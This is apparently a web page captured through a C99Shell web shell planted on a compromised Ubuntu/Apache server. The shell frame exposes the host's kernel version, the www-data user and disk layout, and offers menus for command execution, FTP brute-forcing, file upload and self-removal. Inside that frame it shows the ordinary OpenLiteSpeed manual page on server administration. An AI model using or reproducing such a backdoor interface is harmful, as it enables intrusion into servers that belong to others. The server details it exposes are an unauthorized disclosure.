!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/local/lsws/docs/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     admin.html (7.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
OpenLiteSpeed Users' Manual - Administration

Administration

LiteSpeed web server can be controlled in three ways: through the WebAdmin console, from the command line, or by sending signals.

  1. Through the WebAdmin console:

    WebAdmin console is a centralized control panel to control and configure all LiteSpeed Web Server settings.

    Log on to the WebAdmin console (by default http://[your site's address]:7080/). Select "Service Manager". Here you will find a control panel with links to perform common tasks: server restart, server configuration reload, log viewing, real-time monitoring, virtual host reload, and virtual host enable/disable.

    More details on how to control LiteSpeed Web Server through the WebAdmin console - Service Manager

    To change the login name and password for the WebAdmin interface, run the following command from the shell:
    [your install dir]/admin/misc/admpass.sh

  2. Through the command line interface:

    Assuming the web server is installed at /usr/local/lsws.

    Use the lswsctrl control script in /usr/local/lsws/bin/ directory.

    To start the web server:
    /usr/local/lsws/bin/lswsctrl start

    To stop the web server:
    /usr/local/lsws/bin/lswsctrl stop

    To restart the web server:
    /usr/local/lsws/bin/lswsctrl restart

    To reload the configuration:
    /usr/local/lsws/bin/lswsctrl reload

  3. By sending signals:

    You can stop server processes and reload configurations by sending signals to the server processes.

    First, you need to know the server's process ID, either from the PID file or by running a "ps" command.

    To read the PID file:
    cat /tmp/lshttpd/lshttpd.pid

    By running a "ps" command:
    FreeBSD: ps -x | grep lshttpd
    Others: ps -ef | grep lshttpd

    If multiple processes are listed, use the process with PPID equal to 1.

    To stop the web server: kill XXXX (XXXX is the PID)
    If the server did not stop, use: kill -9 XXXX

    To reload the configurations, use: kill -HUP XXXX


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--